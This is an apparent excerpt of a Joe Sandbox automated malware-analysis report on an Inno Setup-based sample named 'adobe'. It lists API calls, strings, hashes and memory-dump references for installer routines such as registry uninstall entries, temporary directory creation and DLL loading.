• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                          • String ID: unins$unins???.*
                                                                                                                                                          • API String ID: 3541575487-1009660736
                                                                                                                                                          • Opcode ID: d1295e83b56cadd679e89516fa4fe8789c35b69324b7d899325b3bebbac489a6
                                                                                                                                                          • Instruction ID: b9c1e050b5ed1d52b1e0efb42f65b2bb765eda7093c4a0c3f8d8c725b59b8066
                                                                                                                                                          • Opcode Fuzzy Hash: d1295e83b56cadd679e89516fa4fe8789c35b69324b7d899325b3bebbac489a6
                                                                                                                                                          • Instruction Fuzzy Hash: 2A3152746001089BDB10EB65CD85AEE77B9DF84304F5085F6A44CAB2A2DB39DF858B58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00452133,?,?,-00000001,00000000), ref: 0045210D
• GetLastError.KERNEL32(00000000,?,00000000,00452133,?,?,-00000001,00000000), ref: 00452115
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ErrorFileFindFirstLast
• String ID:
• API String ID: 873889042-0
• Opcode ID: 88b781bcb4296e3ffd537f7f1e95cbcfccc1e4a3efc523db206327babc368b1c
• Instruction ID: 036c49f36eb25fa61e7078d8567b07750d6f93a8171c6e64b92e95661d512f34
• Opcode Fuzzy Hash: 88b781bcb4296e3ffd537f7f1e95cbcfccc1e4a3efc523db206327babc368b1c
• Instruction Fuzzy Hash: E4F0FE71A046046B8B10DF6A9D0149FF7ACDB46725B504677FC14D3292D6795E044598
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
• Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
• Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
• Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
• Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
• Opcode Fuzzy Hash: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
• Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 9bd4b3c3cd93b33f15f41ddc4070b4672062d5f2504028d60e03be6cf849f481
• Instruction ID: c04b0fe41e9d582a91f18bf87f4876ef3bc983a53d138609a9f38525333297d5
• Opcode Fuzzy Hash: 9bd4b3c3cd93b33f15f41ddc4070b4672062d5f2504028d60e03be6cf849f481
• Instruction Fuzzy Hash: 12D01D7574420067D700AAA9AC81696758D4784315F00453F7DC5DA2C3F5BDDA885656
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
• Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
• Opcode Fuzzy Hash: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
• Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
  • Part of subcall function 0046DFBC: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,;QG,?,0049B178,?,0046E2D3,?,00000000,0046E840,?,_is1), ref: 0046DFDF
• RegCloseKey.ADVAPI32(?,0046E847,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E892,?,?,0049B178,00000000), ref: 0046E83A
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseValue
• String ID: " /SILENT$5.4.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
• API String ID: 3132538880-3969937391
• Opcode ID: 71cb03abd63313f9dd43a257b28192861709127c35ac81f9101227a176b76bdc
• Instruction ID: 7ce0d42d35b6fb1533783e616244207f763d0b1565f0a99f2df142306da66e40
• Opcode Fuzzy Hash: 71cb03abd63313f9dd43a257b28192861709127c35ac81f9101227a176b76bdc
• Instruction Fuzzy Hash: BB122238A001089FDB14DB96E981ADE73F5EF48704F20847BE8056B395EB79AD41CB5E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• Sleep.KERNEL32(00000000,00000000,00491391,?,?,?,?,00000000,00000000,00000000), ref: 00490EDC
• FindWindowA.USER32(00000000,00000000), ref: 00490F0D
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: FindSleepWindow
• String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
• API String ID: 3078808852-3310373309
• Opcode ID: deb64d7bf062bf764ec33933c26c98728080b6f03e9b990a67158d2513095a52
• Instruction ID: 8c5c55a42f08b3608b522ebaba4d0d27a092f0c69c6fcde6237b95dd3cfeca8d
• Opcode Fuzzy Hash: deb64d7bf062bf764ec33933c26c98728080b6f03e9b990a67158d2513095a52
• Instruction Fuzzy Hash: 66C188A0B0060267EB14BB3E8C92A1E59999FC9708B11D93FF406EB79ADE3DDC05435D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00482005
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00482012
• GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00482020
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00482028
• GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00482034
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00482055
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00482068
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0048206E
• GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00482085
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
• String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
• API String ID: 2230631259-2623177817
• Opcode ID: 9d65caac548fd2376db6168583ed562a4a671010de9918fa7f66a3b614eabcf7
• Instruction ID: 17f89ef16513d558d40e50a148d83660b0106b55f934bc3655b4eb6cfd74668a
• Opcode Fuzzy Hash: 9d65caac548fd2376db6168583ed562a4a671010de9918fa7f66a3b614eabcf7
• Instruction Fuzzy Hash: CA11AFB5009702D9CA2073754E49B6F29888B13714F180D3B6E8076283CAFD8844DB7F
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472E71,?,?,?,?,00000000,00472FCB,?,?,0049B178), ref: 00472A00
• RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472E71,?,?,?,?,00000000,00472FCB,?,?), ref: 00472A09
  • Part of subcall function 004726CC: GetLastError.KERNEL32(00000000,00000000,00000000,004727A0,?,?,0049B178,00000000), ref: 00472759
• RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472E60,?,?,00000000,00472E71,?,?,?,?,00000000,00472FCB,?,?), ref: 00472B27
  • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
  • Part of subcall function 004726CC: GetLastError.KERNEL32(00000000,00000000,00000000,004727A0,?,?,0049B178,00000000), ref: 0047276F
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: DeleteErrorLastValue$CloseCreate
• String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
• API String ID: 2638610037-3092547568
• Opcode ID: 1a1a9a2af84ad15ec946c7ce9a812c5d1000eb2646b86bb23b767eeb733683ad
• Instruction ID: a30fa448762fd9b92e1b54667286fa41a8687ddbeb41c1c5d6153ad75513ee7b
• Opcode Fuzzy Hash: 1a1a9a2af84ad15ec946c7ce9a812c5d1000eb2646b86bb23b767eeb733683ad
• Instruction Fuzzy Hash: 7B32FC74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,004687DE,?,?,00000001,00000000,00000000,004687F9,?,00000000,00000000,?), ref: 004687C7
Strings
• Inno Setup: Selected Tasks, xrefs: 00468733
• Inno Setup: App Path, xrefs: 00468686
• Inno Setup: User Info: Organization, xrefs: 00468796
• %s\%s_is1, xrefs: 00468641
• Inno Setup: User Info: Name, xrefs: 00468783
• Inno Setup: User Info: Serial, xrefs: 004687A9
• Inno Setup: Deselected Components, xrefs: 00468708
• Inno Setup: Deselected Tasks, xrefs: 00468755
• Inno Setup: Icon Group, xrefs: 004686A2
• Inno Setup: Setup Type, xrefs: 004686D6
• Inno Setup: No Icons, xrefs: 004686AF
• Inno Setup: Selected Components, xrefs: 004686E6
• Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468623
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                          • API String ID: 47109696-1093091907
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• (graph image not reproduced) function at 47bac0, basic blocks 47bac0-47bbfa; calls GetProcAddress
APIs
• GetProcAddress.KERNEL32(6FBB0000,SHGetFolderPathA), ref: 0047BBC2
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$n_I$shell32.dll$shfolder.dll
• API String ID: 190572456-1193724077
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• (graph image not reproduced) function at 406334, basic blocks 406334-406381; calls GetModuleHandleA, GetProcAddress, SetProcessDEPPolicy
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00497288), ref: 0040633A
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497288), ref: 0040637E
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressProc$HandleModulePolicyProcess
• String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
• API String ID: 3256987805-3653653586
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• (graph image not reproduced) function at 423884, basic blocks 423884-4239bb; calls GetClassInfoA, RegisterClassA, GetSystemMetrics, SetWindowLongA, SendMessageA, GetSystemMenu, DeleteMenu
APIs
  • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
• GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
• RegisterClassA.USER32(00498630), ref: 004238C7
• GetSystemMetrics.USER32(00000000), ref: 004238E9
• GetSystemMetrics.USER32(00000001), ref: 004238F8
• SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
• SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
• GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
• DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
• DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
• String ID:
• API String ID: 183575631-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• (graph image not reproduced) function at 466994, basic blocks 466994-466b85; calls SHGetFileInfo, ExtractIconA
APIs
• SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00466A37
• ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A5D
  • Part of subcall function 004668D4: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 0046696C
  • Part of subcall function 004668D4: DestroyCursor.USER32(00000000), ref: 00466982
• ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00466AB4
• SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466B15
• ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466B3B
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Icon$Extract$FileInfo$CursorDestroyDraw
• String ID: c:\directory$shell32.dll${H
• API String ID: 3376378930-1386800945
                                                                                                                                                          • Opcode ID: c5a97e1796b603ed3f0fdb04179c7fc19f7dcfe0223a9713a433198ec33ab6e5
                                                                                                                                                          • Instruction ID: bb42604bc5e62439ed76953f0acd9fdfc54ee7023d6ada76ef8daf36ea167999
                                                                                                                                                          • Opcode Fuzzy Hash: c5a97e1796b603ed3f0fdb04179c7fc19f7dcfe0223a9713a433198ec33ab6e5
                                                                                                                                                          • Instruction Fuzzy Hash: 7B518F70600218AFDB10EF65CD8AFCEB7E8EB48704F1181B6B408E7351D638AE81CB59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B907,?,?,00000000,0049A628,00000000,00000000,?,00496C01,00000000,00496DAA,?,00000000), ref: 0047B827
• GetLastError.KERNEL32(00000000,00000000,00000000,0047B907,?,?,00000000,0049A628,00000000,00000000,?,00496C01,00000000,00496DAA,?,00000000), ref: 0047B830
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$qI
• API String ID: 1375471231-3882068889
• Opcode ID: 65bf9df88311f7e70d98ca3ccf54c78a0b3cdf80d0a15da0aa22ddd0f6c1404e
• Instruction ID: 4382150b65a239bcd865909c49c5e3b79134296aa5f4b8b5b06b090679d32ad3
• Opcode Fuzzy Hash: 65bf9df88311f7e70d98ca3ccf54c78a0b3cdf80d0a15da0aa22ddd0f6c1404e
• Instruction Fuzzy Hash: DE414B74A002099FDB01FFA5D882ADEB7B5EF44305F50843BE51477392DB389E058B99
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetActiveWindow.USER32 ref: 0042F403
• GetFocus.USER32 ref: 0042F40B
• RegisterClassA.USER32(004987AC), ref: 0042F42C
• CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
• CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
• ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
• SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457B52,00000000,0049A628), ref: 0042F4C8
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
